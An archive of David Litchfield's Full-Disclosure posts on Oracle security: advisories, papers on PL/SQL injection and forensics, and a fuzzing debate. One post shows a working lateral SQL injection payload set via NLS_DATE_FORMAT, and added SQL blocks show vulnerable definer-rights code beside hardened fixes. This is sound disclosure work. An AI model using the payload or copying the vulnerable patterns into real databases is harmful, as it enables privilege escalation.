[Full-disclosure] Two papers on Oracle 11g Security

2010-02-11 Thread David Litchfield
Hey all,
Since there seems to be a fair bit of disinformation, and utter nonsense, 
floating around since my talk at the Black Hat Federal security conference 
the other day, I have decided to publish the following papers.

http://www.databasesecurity.com/HackingAurora.pdf
http://www.databasesecurity.com/ExploitingPLSQLinOracle11g.pdf

Whilst the papers were written on the 14th and 21st of October respectively, 
Oracle were informed of the issues discussed in these papers on the 11th 
and 13th of October 2009.

The slides from the talk can be found here:

http://www.databasesecurity.com/bh-DC2010.pdf


Cheers,
David Litchfield


--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other than
the intended recipient(s), any disclosure, copying, distribution, or any
other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: Manchester Technology Centre,
Oxford Road, Manchester, M1 7EF with Company Number 04225835 and
VAT Number 783096402 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Oracle 11g (11.1.0.6) Password Policy and Compliance

2009-08-25 Thread David Litchfield
Many security standards require the tracking of users' password history to 
prevent password re-use. In Oracle 11g (11.1.0.6), if a security 
administrator has enabled 11g passwords exclusively then tracking password 
history is broken. This can affect compliance. This was addressed by Oracle 
in their April 2009 Critical Patch Update and maps to the currently 
unspecified vulnerability at 
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0988
Cheers,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/



[Full-disclosure] Oracle PL/SQL Injection Flaw in REPCAT_RPC.VALIDATE_REMOTE_RC

2009-08-25 Thread David Litchfield
Hey all,
The Oracle REPCAT_RPC.VALIDATE_REMOTE_RC function executes blocks of 
anonymous PL/SQL that can be influenced by an attacker to execute arbitrary 
PL/SQL. As this package is only accessible directly by SYS this flaw would 
not normally present a risk. However, the REPCAT_RPC.VALIDATE_REMOTE_RC 
function can be used as an auxiliary inject function to escalate privileges. 
This is described in a paper I wrote in February 2007 after reporting the 
issue but am only releasing now as the flaw has been fixed by Oracle in their 
July 2009 Critical Patch Update. This flaw documents the currently 
unspecified flaw at 
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1021

The paper is available from 
http://www.databasesecurity.com/oracle/plsql-injection-create-session.pdf

Please note that many of the techniques discussed in this paper have been 
superseded by cursor injection 
(http://www.databasesecurity.com/dbsec/cursor-injection.pdf) which was 
written 3 days after.

Cheers,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/



[Full-disclosure] Bypassing DBMS_ASSERT in certain situations

2009-08-25 Thread David Litchfield
DBMS_ASSERT can be used to prevent PL/SQL injection. In certain cases it can 
be bypassed. This is documented in a paper I wrote in July 2008 but am only 
publishing now: 
http://www.databasesecurity.com/oracle/Bypassing-DBMS_ASSERT.pdf
Cheers,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/



[Full-disclosure] Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2

2009-01-13 Thread David Litchfield

NGSSoftware Insight Security Research Advisory

Name: Trigger abuse of MDSYS.SDO_TOPO_DROP_FTBL
Systems Affected: Oracle 10g R1 and R2 (10.1.0.5 and 10.2.0.2)
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ dav...@ngssoftware.com ]
Reported: 23rd July 2008
Date of Public Advisory: 13th January 2009
Advisory number: #NISR13012009
CVE: CVE-2008-3979

Overview

Oracle has just released a fix for a flaw that, when exploited, allows a low 
privileged authenticated database user to gain MDSYS privileges. This can be 
abused by an attacker to perform actions as the MDSYS user.

Details
***
MDSYS.SDO_TOPO_DROP_FTBL is one of the triggers that forms part of the 
Oracle Spatial Application. It is vulnerable to SQL injection. When a user 
drops a table the trigger fires. The name of the table is embedded in a 
dynamic SQL query which is then executed by the trigger. Note that the 
Oracle advisory states that the attacker requires the DROP TABLE and CREATE 
PROCEDURE privileges. This is not the case and only CREATE SESSION 
privileges are required.

Fix Information
***
Oracle was alerted to this flaw on the 23rd July 2008. A patch has now been 
made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner 
designed specifically for Oracle, can be used to accurately determine 
whether your servers are vulnerable to these flaws. More information about 
NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php

About NGSSoftware
*
NGSSoftware, an NCC Group Company, develops vulnerability assessment and 
compliancy tools for database servers including Oracle, Microsoft SQL 
Server, DB2, Sybase and Informix. Headquartered in the United Kingdom NGS 
has offices in London, St. Andrews (UK), Brisbane, and Perth (Australia) and 
Seattle in the United States; NGS provide services to some of the largest 
and most demanding organizations around the globe.

http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076



[Full-disclosure] New tool and paper for Oracle forensics...

2008-11-25 Thread David Litchfield
Hey all,
I've just posted a new tool and paper for Oracle forensics. The tool, 
orablock, allows a forensic investigator to dump data from a "cold" Oracle 
data file - i.e. there's no need to load up the data file in the database 
which would cause the data file to be modified, so using orablock preserves 
the evidence. Orablock can also be used to locate "stale" data - i.e. data 
that has been deleted or updated. It can also be used to dump SCNs for data 
blocks which can be useful during the examination of a compromised Oracle 
box. Indeed, this is the subject of the paper "Oracle Forensics Part 7: 
Using the Oracle System Change Number in Forensic Examinations". Both the 
tool (which compiles on Linux, Mac OS X and Windows) and the paper are 
available from http://www.databasesecurity.com/.
Cheers,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/



Re: [Full-disclosure] Deep Blind SQL Injection Whitepaper

2008-08-19 Thread David Litchfield
Hi Ferruh,

> This is a short whitepaper about a new way to exploit Blind SQL 
> Injections.

I just had a read of your paper. You open with: "If the injection point is 
completely blind then the only way to extract data is using time based 
attacks like WAITFOR DELAY, BENCHMARK etc." This is not the case. You can 
use other non-time based (and therefore faster) methods to infer the value 
of data. See "Data-mining with SQL Injection and Inference" - 
http://www.ngssoftware.com/papers/sqlinference.pdf

Cheers,
David





Re: [Full-disclosure] Pwnie Awards 2008

2008-07-21 Thread David Litchfield
Hey Alexandr,
I see I'm invited to award Brett his pwnie for his SQL flaw if he wins. I'd
be more than happy to - after all one bug over 3 years means someone did a
really good job ;)
Cheers,
David



[Full-disclosure] Lateral SQL Injection Revisited - No Special Privs Required

2008-07-18 Thread David Litchfield
At the end of April 2008 I published a paper about a new class of flaw in
Oracle entitled "Lateral SQL Injection". 

The paper can be found here:
http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf

Essentially the paper details a way in which the attacker can manipulate the
environment to trick an Oracle database into using arbitrary SQL in DATE
functions and data. 

A number of people at the time dismissed it as irrelevant because the
attacker required the ALTER SESSION privilege. Well, as it turns out, you
don't need the ALTER SESSION privilege at all. Here's why: there are certain
ALTER SESSION statements that can be executed even though the user doesn't
have the ALTER SESSION privilege. The statements that can be executed
without the privilege include those that relate to National Language
Support. Thus a user without ALTER SESSION privileges can change the date
format and so employ a lateral SQL injection attack. The script below shows
this in action. We connect to a fully patched 11g server and confirm we only
have CREATE SESSION privileges - i.e. the minimum we need to connect to the
server - everyone gets this privilege. We then issue an ALTER SESSION
statement to try to set SQL_TRACE to true. As expected this fails with an
insufficient privileges error. But then we issue an ALTER SESSION to set
the NLS_DATE_FORMAT and this succeeds. Lastly we call the SYSDATE function
to confirm it took.


C:\>sqlplus /nolog

SQL*Plus: Release 11.1.0.6.0 - Production on Fri Jul 18 14:47:17 2008

Copyright (c) 1982, 2007, Oracle.  All rights reserved.

SQL> connect testuser1/testuser1
Connected.
SQL> select * from session_privs;

PRIVILEGE

CREATE SESSION

SQL> alter session set sql_trace = true;
alter session set sql_trace = true
*
ERROR at line 1:
ORA-01031: insufficient privileges


SQL> alter session set nls_date_format='"'' and myfunc()=1--"';

Session altered.

SQL> select sysdate from dual;

SYSDATE
--
' and myfunc()=1--

SQL>

Thus we can see that no special privileges are required to effect a lateral
SQL injection attack. I suppose I should have spotted this at the time.
Cheers,
David

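The script above shows the session-level half of the problem; the other half is server-side PL/SQL that splices SYSDATE into dynamic SQL as text. As an added example that is not from the original post or paper, here is that pattern beside two hardened forms and a review query; APP_LOG and the three procedure names are placeholders.

```sql
-- Added example, not from the post: why the NLS_DATE_FORMAT trick matters and
-- how to write date handling that is immune to it. APP_LOG and the three
-- procedure names are placeholders.
CREATE TABLE app_log (msg VARCHAR2(200), created DATE);

-- Vulnerable pattern. SYSDATE is a DATE; concatenating it with || converts it
-- to text using the caller's session NLS_DATE_FORMAT. Since that parameter
-- can be changed with only CREATE SESSION, the caller controls the text that
-- lands inside the quotes, and a format containing a quote breaks out of the
-- literal. A definer-rights procedure then runs the result as its owner.
CREATE OR REPLACE PROCEDURE count_since_vuln (p_count OUT NUMBER) AS
  l_sql VARCHAR2(4000);
BEGIN
  l_sql := 'SELECT COUNT(*) FROM app_log WHERE created >= '''
        || (SYSDATE - 1) || '''';
  EXECUTE IMMEDIATE l_sql INTO p_count;
END;
/

-- Hardened pattern 1: bind the DATE. No text conversion happens, so the
-- session date format never becomes part of the statement. Prefer this.
CREATE OR REPLACE PROCEDURE count_since_bind (p_count OUT NUMBER) AS
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM app_log WHERE created >= :since'
    INTO p_count USING SYSDATE - 1;
END;
/

-- Hardened pattern 2: when the value must be spliced into the SQL text,
-- convert it yourself with an explicit format mask. TO_CHAR with this
-- literal mask yields only digits, hyphens, a space and colons whatever the
-- session NLS settings are, and TO_DATE on the SQL side uses the same mask.
CREATE OR REPLACE PROCEDURE count_since_tochar (p_count OUT NUMBER) AS
  l_sql VARCHAR2(4000);
BEGIN
  l_sql := 'SELECT COUNT(*) FROM app_log WHERE created >= TO_DATE('''
        || TO_CHAR(SYSDATE - 1, 'YYYY-MM-DD HH24:MI:SS')
        || ''', ''YYYY-MM-DD HH24:MI:SS'')';
  EXECUTE IMMEDIATE l_sql INTO p_count;
END;
/

-- Review query for existing code: source lines that both reference SYSDATE
-- and use string concatenation are candidates for the vulnerable pattern and
-- worth reading by hand. Requires SELECT on DBA_SOURCE.
SELECT owner, name, type, line, text
  FROM dba_source
 WHERE UPPER(text) LIKE '%SYSDATE%'
   AND text LIKE '%||%'
 ORDER BY owner, name, line;
```

The same conversion applies to any DATE or TIMESTAMP value concatenated into text, not only SYSDATE, so the review query is a starting point rather than a complete check.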


[Full-disclosure] Oracle Application Server PLSQL injection flaw

2008-07-15 Thread David Litchfield
NGSSoftware Insight Security Research Advisory

Name: PLSQL Injection in Oracle Application Server
Systems Affected: Oracle Application Server 9.0.4.3, 10.1.2.2, 10.1.4.1
Severity: Critical
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ [EMAIL PROTECTED] ]
Reported: 9th October 2007
Date of Public Advisory: 15th July 2008
Advisory number: #NISR15072008
CVE: CVE-2008-2589


Overview

Oracle has just released a fix for a flaw that, when exploited, allows an
unauthenticated attacker on the Internet to gain full control of a backend
Oracle database server via the front end web server.

Details
***
Oracle Application Server installs a number of PLSQL packages in the backend
database server. One of these is the WWV_RENDER_REPORT package and it is
vulnerable to PLSQL injection. This package uses definer rights execution
and therefore executes with the privileges of the owner, in this case the
highly privileged PORTAL user.

Specifically, the SHOW procedure takes as its 2nd argument the name of a
function to execute and this is embedded with a dynamically executed
anonymous block of PLSQL without first being sanitized. Because it is a
block of anonymous PLSQL, an attacker can exploit this flaw to run any SQL
statement, for example, create new users, grant dba privileges, delete or
modify data. This is achieved by wrapping the statement(s) within an
"execute immediate" statement and specifying the autonomous_transaction
pragma.

Fix Information
***
Oracle was alerted to this flaw on the 9th October 2007. A patch has now
been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner
designed specifically for Oracle, can be used to accurately determine
whether your servers are vulnerable to these flaws. More information about
NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php

About NGSSoftware
*
NGSSoftware develops vulnerability assessment and compliancy tools for
database servers including Oracle, Microsoft SQL Server, DB2, Sybase and
Informix. Headquartered in the United Kingdom NGS has offices in London, St.
Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United
States; NGSConsulting provide services to some of the largest and most
demanding organizations around the globe.

http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076

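This advisory and the earlier SDO_TOPO_DROP_FTBL trigger advisory share one root cause: a caller-influenced identifier is spliced into dynamically executed PL/SQL that runs with the owner's privileges. As an added example that is not Oracle's code and not from either advisory, here is that pattern beside a hardened form; RUN_REPORT_FUNC_VULN, RUN_REPORT_FUNC, REPORT_OWNER and REPORT_FUNC_ALLOWLIST are placeholder names.

```sql
-- Added example: the "identifier in dynamic PL/SQL" pattern behind the two
-- advisories, and a hardened version. RUN_REPORT_FUNC*, REPORT_OWNER and
-- REPORT_FUNC_ALLOWLIST are placeholders.

-- Vulnerable pattern. p_func is meant to be a function name, but it is pasted
-- verbatim into an anonymous block, so it can carry arbitrary statements.
-- Without an AUTHID clause the procedure has definer rights: the block runs
-- as the owner (PORTAL in the advisory), whatever the caller's privileges.
CREATE OR REPLACE PROCEDURE run_report_func_vuln (
  p_func IN VARCHAR2, p_out OUT VARCHAR2) AS
BEGIN
  EXECUTE IMMEDIATE 'BEGIN :r := ' || p_func || '; END;' USING OUT p_out;
END;
/

-- Hardened pattern, three layers:
--  1. DBMS_ASSERT.QUALIFIED_SQL_NAME rejects anything that is not a
--     well-formed [schema.]name (ORA-44004); DBMS_ASSERT.SQL_OBJECT_NAME
--     additionally requires the named object to exist (ORA-44002).
--  2. An allow-list table (names stored in upper case): a well-formed,
--     existing name must also be one the application chose to expose.
--     Callers need SELECT on it.
--  3. AUTHID CURRENT_USER: the dynamic block runs with the caller's own
--     privileges, so even a bypass of the checks gains nothing extra.
CREATE TABLE report_owner.report_func_allowlist (
  func_name VARCHAR2(128) PRIMARY KEY);

CREATE OR REPLACE PROCEDURE run_report_func (
  p_func IN VARCHAR2, p_out OUT VARCHAR2) AUTHID CURRENT_USER AS
  l_name  VARCHAR2(128);
  l_found NUMBER;
BEGIN
  l_name := DBMS_ASSERT.QUALIFIED_SQL_NAME(p_func);
  l_name := DBMS_ASSERT.SQL_OBJECT_NAME(l_name);
  SELECT COUNT(*) INTO l_found
    FROM report_owner.report_func_allowlist
   WHERE func_name = UPPER(l_name);
  IF l_found = 0 THEN
    RAISE_APPLICATION_ERROR(-20001, 'report function not permitted: ' || l_name);
  END IF;
  EXECUTE IMMEDIATE 'BEGIN :r := ' || l_name || '; END;' USING OUT p_out;
END;
/

-- Review query: definer-rights units that build dynamic SQL or PL/SQL. Each
-- hit is a place where the inputs reaching the dynamic statement need to be
-- validated. Requires SELECT on DBA_SOURCE and DBA_PROCEDURES.
SELECT DISTINCT s.owner, s.name, s.type, s.line, s.text
  FROM dba_source s
  JOIN dba_procedures p
    ON p.owner = s.owner AND p.object_name = s.name
 WHERE p.authid = 'DEFINER'
   AND (UPPER(s.text) LIKE '%EXECUTE IMMEDIATE%'
        OR UPPER(s.text) LIKE '%DBMS_SQL.PARSE%')
 ORDER BY s.owner, s.name, s.line;
```

The DBMS_ASSERT checks are one layer, not the whole fix: the "Bypassing DBMS_ASSERT" post earlier in this archive is the reason the allow-list and invoker rights are there as well.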


[Full-disclosure] A New Class of Vulnerability in Oracle: Lateral SQL Injection

2008-04-24 Thread David Litchfield
Hey all,
I've just released some research that demonstrates a new class of
vulnerability in Oracle and how it can be exploited by an attacker. You can
grab the paper from here:
http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf
Cheers,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/
http://www.davidlitchfield.com/blog




[Full-disclosure] Oracle 11g/10g Installation Vulnerability

2007-11-13 Thread David Litchfield
Hey all,
After investigating 11g the other day I came across an interesting issue.
During the installation of Oracle 11g and 10g all accounts, including the
SYS and SYSTEM accounts, have their default passwords and only at the end of
the install are the passwords changed. This means that there is a window of
opportunity for an attacker to log into the database server during the
install process. Which install options you choose determines the size of
the window. Full details for those that are
interested can be found here:
http://www.davidlitchfield.com/blog/archives/0030.htm - since I reported
this to Oracle on the 3rd of November they've updated their security
checklist document:
http://www.oracle.com/technology/deploy/security/pdf/twp_security_checklist_db_database_20071108.pdf
Cheers,
David Litchfield



[Full-disclosure] SQL Injection Flaw in Oracle Workspace Manager

2007-10-17 Thread David Litchfield
(resend with title...)

NGSSoftware Insight Security Research Advisory

Name: SQL Injection Flaw in Oracle Workspace Manager
Systems Affected: Oracle 10g release 1 and 2, Oracle 9i
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ [EMAIL PROTECTED] ]
Reported: 22nd August 2006
Date of Public Advisory: 17th October 2007
Advisory number: #NISR17102007B


Description
***
The Workspace Manager in Oracle 10g release 1 and 2 and Oracle 9i is
vulnerable to SQL injection.
 
Details
***

The Workspace Manager, owned by SYS, contains a package called LT. This
package is owned and defined by the SYS user and can be executed by PUBLIC.
LT contains a procedure called FINDRICSET which calls the FINDRICSET package
in the LTRIC package. This is vulnerable to SQL injection and can be abused
by an attacker to gain SYS privileges.

 
Fix Information
***
Oracle was alerted to this flaw on the 22nd of August 2006. A patch has now
been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner
designed specifically for Oracle, can be used to accurately determine
whether your servers are vulnerable to this flaw. More information about
NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php

 
About NGSSoftware
*
NGSSoftware develops vulnerability assessment and compliancy tools for
database servers including Oracle, Microsoft SQL Server, DB2, Sybase and
Informix. Headquartered in the United Kingdom NGS has offices in London, St.
Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United
States; NGSConsulting provide services to some of the largest and most
demanding organizations around the globe.
http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076
[EMAIL PROTECTED]



[Full-disclosure] Another Oracle Forensics Paper...

2007-08-16 Thread David Litchfield
Hey all,
For anyone that's interested I've just posted another paper entitled "Oracle 
Forensics Part 6: Examining Undo Segments, Flashback and the Oracle Recycle 
Bin". You can get this and other papers on Oracle forensics from 
http://www.databasesecurity.com/oracle-forensics.htm
Cheers,
David Litchfield



[Full-disclosure] New Oracle Forensics Paper

2007-08-10 Thread David Litchfield
Hey all,
I've just posted a new paper on Oracle Forensics and my Black Hat 
presentation to
http://www.databasesecurity.com/oracle-forensics.htm
The new paper is entitled "Oracle Forensics Part 5: Finding Evidence of Data 
Theft in the Absence of Auditing" and explores some of the ideas I discussed 
at Blackhat.
Cheers,
David Litchfield



[Full-disclosure] Oracle Forensics Part 4: Live Response

2007-05-17 Thread David Litchfield
Hey all,
For anyone that wants a copy, I've just posted the fourth paper in the 
Oracle Forensics series I'm writing to http://www.databasesecurity.com/. 
This paper covers what an incident responder should do during a Live 
Response on a compromised Oracle server.
Cheers,
David Litchfield



[Full-disclosure] Analysis of the Oracle April 2007 Critical Patch Update

2007-04-18 Thread David Litchfield
Hey all,
I've just posted an analysis of the Oracle April 2007 Critical Patch Update 
to
http://www.ngssoftware.com/research/papers/NGSSoftware-OracleCPUAPR2007.pdf
(URL may line wrap)
Cheers,
David Litchfield




[Full-disclosure] Three New Papers on Oracle Forensics

2007-04-04 Thread David Litchfield
Hey all,
For anyone that's interested I've just written three papers relating to 
Oracle forensics. More will follow...

Oracle Forensics Part 1: Dissecting the Redo Logs
Oracle Forensics Part 2: Locating Dropped Objects
Oracle Forensics Part 3: Isolating Evidence of Attacks Against the 
Authentication Mechanism

You can grab them here: http://www.databasesecurity.com/

Cheers,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/



[Full-disclosure] Cursor Injection - A New Method for Exploiting PL/SQL Injection and Potential Defences

2007-02-25 Thread David Litchfield
Hey all,
I've just put up a paper detailing a new method of exploiting PL/SQL 
injection flaws in Oracle and potential ways to protect against it. The 
method entirely removes the requirement for an attacker to create functions 
to be able to execute arbitrary sql. This should finally put to bed those 
arguments about whether such and such a PL/SQL injection flaw is exploitable 
in practice or not by a user with only the CREATE SESSION system privilege. 
They all are. For anyone going to Blackhat Federal, this'll form part of my 
talk. For anyone that wants, you can get a copy of the paper from 
http://www.databasesecurity.com/ - it's called "Cursor Injection - A New 
Method for Exploiting PL/SQL Injection and Potential Defences".
Cheers,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/
+44(0)208 401 0070





[Full-disclosure] Oracle - Indirect Privilege Escalation and Defeating Virtual Private Databases

2007-01-29 Thread David Litchfield
Hey all,
For anyone that's interested I've just put out two papers (chapters really); 
one on Indirect Privilege Escalation in Oracle and the other on Defeating 
Virtual Private Databases in Oracle. You can grab them here.
http://www.databasesecurity.com/dbsec/ohh-indirect-privilege-escalation.pdf
http://www.databasesecurity.com/dbsec/ohh-defeating-vpd.pdf
Cheers,
David



[Full-disclosure] Cursor snarfing - a new class of vulnerability and attack in Oracle

2006-11-27 Thread David Litchfield
Hey all,
I've just written a paper detailing a fairly common PL/SQL programming error
related to cursors that leads to a new class of vulnerability in Oracle. You
can get a copy of the paper from http://www.databasesecurity.com/ .
Cheers,
David Litchfield
NGSSoftware Ltd
+44(0) 208 401 0070
http://www.ngssoftware.com/




[Full-disclosure] Analysis of the Oracle October 2006 Critical Patch Update

2006-10-18 Thread David Litchfield
Hey all,
I've just posted an analysis of the 22 Oracle RDBMS flaws patched by the 
October 2006 Critical Patch Update that was released yesterday: 
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2006.html.
 
Further, it's a shame to see that, after a promising July 2006 CPU where 
Oracle had all the patches ready *on time*, they have slipped back into 
their old, bad habits - patches are not ready for a number of platforms. I 
thought they'd solved those issues - but clearly not. You can get a copy of 
the analysis from 
http://www.databasesecurity.com/oracle/OracleOct2006-CPU-Analysis.pdf,
Cheers,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/
+44(0) 208 401 0070






[Full-disclosure] ASLR now built into Vista

2006-05-25 Thread David Litchfield
Address Space Layout Randomization is now part of Vista as of beta 2 [1] . I 
wrote about ASLR on the Windows platform back in September last year [2] and 
noted that unless you rebase the image exe then little (not none!) is added. 
ASLR in Vista solves this so remote exploitation of overflows has just got a 
lot harder. I've not done a thorough analysis yet but, all going well, this 
is a fantastic way for Microsoft to go and builds on the work done with 
NX/DEP and stack cookies/canaries.


Cheers,
David Litchfield

[1] 
http://msdn.microsoft.com/windowsvista/downloads/products/getthebeta/default.aspx

[2] http://www.ngssoftware.com/papers/xpms.pdf





[Full-disclosure] Re: How secure is software X?

2006-05-13 Thread David Litchfield

Hi Justin,

One thing you have to keep in mind is that a lot of things are incredibly
variable when dealing with this subject. For instance, suppose you want to
ensure that the URI in a web server is not overflowable. So you test with
something like

GET /[A x 4096] HTTP/1.1
Host: foobar.com
Connection: close

This is all fine and well, unless at 8192 is where the overflow takes
place, or if I can stick as many characters as I want in, so long as I am
using HTTP 1.1 and not HTTP 0.9, or if I am using HTTP/1.1 and Host doesn't
contain 36 backslashes, et cetera.

This is generally why fuzzing is mostly inconclusive because it often
misses a lot of conditions and you have essentially assured nothing. Without
in-depth analysis of each software package you are basically pushing snake
oil. There are just far too many variables to really standardize such a
thing.



There are a few things to remember:
1) There are still too many products that fall to simple fuzzing. Having a 
standard that employs fuzzing as part of it means that (hopefully!) vendors 
will develop at least to that level - this raises the bar so to speak.
2) Not all fuzzers are born equal. Having written a fair few in my time I do 
realize that condition based fuzzing is important. A very simple but quite 
common example, to add to the ones you've given, is with SMTP fuzzing. Some 
overflows only trigger after an EHLO greeting but not after a HELO. A good 
fuzzer and a good fuzzing process should take into consideration as many 
conditions as possible.
3) Fuzzing would only be part of the standard to be proposed. There are 
code/assembly scanning tools which can be incorporated amongst other things.



Cheers,
David




Best Regards,

Justin Ferguson
Reverse Engineer
NNSA IARC
702.942.2539

"It is a capital mistake to theorize before one has data. Insensibly one
begins to twist facts to suit theories, instead of theories to suit 
facts."

-- Sir Arthur Conan Doyle


-Original Message-
From: Adam Shostack [mailto:[EMAIL PROTECTED]
Sent: Friday, May 12, 2006 11:35 AM
To: David Litchfield
Cc: bugtraq@securityfocus.com;
full-disclosure@lists.grok.org.uk;
[EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: How secure is software X?


Hi David,

Very briefly because I'm swamped today:  Please consider
bringing some of this to Metricon
(https://securitymetrics.org/content/Wiki.jsp?page=Welcome)

Also there's a project of US DHS/NIST and probably others
called SAMATE Software Assurance Metrics and Tool Evaluation
http://samate.nist.gov/index.php/Main_Page

which might be of interest.

Adam

On Fri, May 12, 2006 at 02:59:17AM +0100, David Litchfield wrote:
| How secure is software X?
|
| At least as secure as Vulnerability Assessment Assurance Level P; or Q
| or R. Well, that's what I think we should be able to say. What we need
| is an open standard, that has been agreed upon by recognized experts,
| against which the absence of software security vulnerability can be
| measured - something which improves upon the failings of the Common
| Criteria. Let's choose web server software as an example. When looking
| for flaws in a new piece of web server software there are a bunch of
| well known checks that one would throw at it first. Try directory
| traversal attacks and the several variations. Try overflowing the
| request method, the URI, the query string, the host header field and
| so on. Try cross site scripting attacks in server error pages and file
| not found messages. As I said, there's a bunch of checks and I've
| mentioned but a few. If these were all written down and labelled as a
| "standard" then one could say that web server software X is at least
| as secure as the standard - providing of course the server stands up.
|
| For products that are based upon RFCs it would be trivial to write a
| simple criteria that tests every aspect of the software as per the
| RFCs. This would be called Vulnerability Assessment Assurance Level:
| Protocol. If a bit of software was accredited at VAAL:Protocol then it
| would give a level of assurance that it at least stood up to those
| attacks.
|
| Not all products are RFC compliant however. Sticking with web servers,
| one bit of software might have a bespoke request method of "FOOBAR".
| This opens up a whole new attack surface that's not covered by the
| VAAL:Protocol standard. There are two aspects to this. Anyone with a
| firewall capable of blocking non-RFC compliant requests could
| configure it to do so - thus closing off the attack surface - from the
| outside at least. As far as the standards go however - you'd have to
| introduce criteria to cover that specific functionality. And what
| about different application environments running on top of the web
| server? And what about more complex products such as database servers?
| I suppose at a minimum for DB software you could at least have a stand

Re: [Full-disclosure] How secure is software X?

2006-05-11 Thread David Litchfield

From: "Michael Silk" <[EMAIL PROTECTED]>




why do we need this?


Take your average bit of common software. I can bet someone's thrown Spike 
at it, someone else crazyfuzz, and another foofuz. Now let's say that it 
stood up to everything that was thrown at it - and let's say another product 
crumbled in the first few seconds. I'd rather have the first product on my 
network if, as a business requirement, I need the functionality that that 
software provided. Sure - it's not a guarantee that it's devoid of security 
vulnerability but I can be assured that the software's not going to fall to 
a script kiddie.


If a product did stand up to Spike, crazyfuzz and foofuzz then let's talk 
about it! The problem is you only ever hear about when these fuzzers 
actually find things.


What I'm suggesting is simply collating our bug-hunting collective knowledge 
into a standard. Those who wish to protect their "trade secret bug find 
techniques" don't have to play if they don't want.


But in answering "why do we need this?" you clearly don't - but there are 
people out there that do need this - or at least would like it.



you're referring to what already takes place commercially.
"hi i want a security assessment".
who's going to do these assessments for free? who confirms that the
people doing the assessment know what they are doing?


The thing with a standard is that it is a standard. As such, efforts should be 
entirely reproducible. Have 3 or more people follow that standard and 
compare results at the end. If there's a discrepancy someone's not following 
the standard. The other aspect of course is that it's trivial to write and 
verify tools that follow a standard.




"Customer: I was hacked .." -> me: -> "David Litchfield told me it was
secure, blame him" -> "David Litchfield: Oh no, our VAAL is just a
guide." -> "Customer: So why the hell do I care about it then?"



Guides for people to use are okay (hello OWASP Guide, and others) but
all you're trying to start is a non-commercial free security assessment
service.


Absolutely. Let's face it - it's what goes on every day, anyway. At least 
people who care about assurance would be able to make something useful out 
of all that effort. Besides, who said it had to be free? Like CC - if a 
company wanted their product evaluated they could pay for it. Or not. I'm 
sure cost will become relevant at some point but not now. I'm more 
interested in the technical merits at the moment.


Cheers,
David Litchfield
http://www.databasesecurity.com/
http://www.ngssoftware.com/



[Full-disclosure] How secure is software X?

2006-05-11 Thread David Litchfield

How secure is software X?

At least as secure as Vulnerability Assessment Assurance Level P; or Q or R. 
Well, that's what I think we should be able to say. What we need is an open 
standard, that has been agreed upon by recognized experts, against which the 
absence of software security vulnerability can be measured - something which 
improves upon the failings of the Common Criteria. Let's choose web server 
software as an example. When looking for flaws in a new piece of web server 
software there are a bunch of well known checks that one would throw at it 
first. Try directory traversal attacks and the several variations. Try 
overflowing the request method, the URI, the query string, the host header 
field and so on. Try cross site scripting attacks in server error pages and 
file not found messages. As I said, there's a bunch of checks and I've 
mentioned but a few. If these were all written down and labelled as a 
"standard" then one could say that web server software X is at least as 
secure as the standard - providing of course the server stands up.


For products that are based upon RFCs it would be trivial to write a simple 
criteria that tests every aspect of the software as per the RFCs. This would 
be called Vulnerability Assessment Assurance Level: Protocol. If a bit of 
software was accredited at VAAL:Protocol then it would give a level of 
assurance that it at least stood up to those attacks.


Not all products are RFC compliant however. Sticking with web servers, one 
bit of software might have a bespoke request method of "FOOBAR". This opens 
up a whole new attack surface that's not covered by the VAAL:Protocol 
standard. There are two aspects to this. Anyone with a firewall capable of 
blocking non-RFC compliant requests could configure it to do so - thus 
closing off the attack surface - from the outside at least. As far as the 
standards go however - you'd have to introduce criteria to cover that 
specific functionality. And what about different application environments 
running on top of the web server? And what about more complex products such 
